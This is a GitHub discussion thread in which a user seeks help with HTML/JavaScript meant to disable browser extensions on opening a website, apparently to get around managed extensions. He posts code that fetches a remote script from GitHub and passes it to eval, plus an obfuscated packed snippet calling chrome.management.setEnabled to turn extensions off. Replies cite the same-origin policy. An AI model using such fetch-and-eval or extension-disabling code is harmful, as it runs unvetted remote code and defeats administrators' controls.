### DISCUSSION TITLE
How come this code i made is not working?

### DISCUSSION THREAD

**Discussion by phillipbruh** [3kh0/ext-remover#29] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
Hi i am trying to disable extentions when i open a website and this is the code i have

<script>
var newWin = window.open("https://chrome.google.com/webstorex");
newWin.fetch("https://raw.githubusercontent.com/phillipbruh/snowplus/main/idk").then(data=>{data.text().then(text=>{eval(text)})})
</script>

it should work but it dosent the fetch works by itself fine and the newWin. works with everything else like alert but when i put them together it does not work do you know why?

**Comment by 3kh0** [comment]
I do not think code can carry over to new windows due to security on chrome...

**Comment by phillipbruh** [comment]
but  

var newWin = window.open("https://chrome.google.com/webstorex"); 
newWin.alert("hi");

works?

**Comment by phillipbruh** [comment]
and when i do
<script> var newWin = window.open("https://chrome.google.com/webstorex"); newWin.fetch("https://raw.githubusercontent.com/phillipbruh/snowplus/main/idk").then(data=>{data.text().then(text=>{eval(text)})}) </script>
it just runs it on index.html

**Comment by phillipbruh** [comment]
i just tested
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d(\'c b a: (9 8 7)\').6(\',\').5(0=>{4.3.2(0,!1)})',14,14,'i||setEnabled|management|chrome|forEach|split|commas|by|seperated|here|IDs|Extension|prompt|uninstall'.split('|'),0,{}))

and it works is there a way i can just set the vars instead of asking for them? while still staying in eval

**Reply by 3kh0** [reply]
idk

**Comment by rusprice** [comment, marked as answer]
1. You are misspelling "extensions" as "extentions" all throughout your wording and code
2. You can't run JS on windows where the origin violates the same-origin policy

**Reply by phillipbruh** [reply]
i am running it on https://chrome.google.com/webstorex
using the newWin var

**Comment by Aka-but-nice** [comment]
That awfully looks like HTML, try using the "var" command instead of <script> .

**Reply by Aka-but-nice** [reply]
i mean var command After using <script>

**Reply by phillipbruh** [reply]
it is html it was meant so you just have to click a button to inject the code
